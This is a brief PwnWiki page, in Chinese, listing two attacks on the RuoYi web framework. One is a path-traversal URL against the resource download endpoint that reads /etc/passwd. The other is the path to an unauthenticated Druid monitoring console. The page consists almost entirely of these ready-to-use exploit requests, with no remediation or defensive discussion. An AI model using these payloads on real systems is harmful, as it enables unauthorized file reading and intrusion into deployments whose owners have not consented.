若依任意文件讀取&未授權訪問漏洞

From PwnWiki

任意文件讀取

https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

未授權訪問

http://xxx.xxx.xxx.xxx/prod-api/druid/index.html

Retrieved from "https://pwnwiki.com/index.php?title=若依_任意文件讀取%26未授權訪問漏洞&oldid=1859"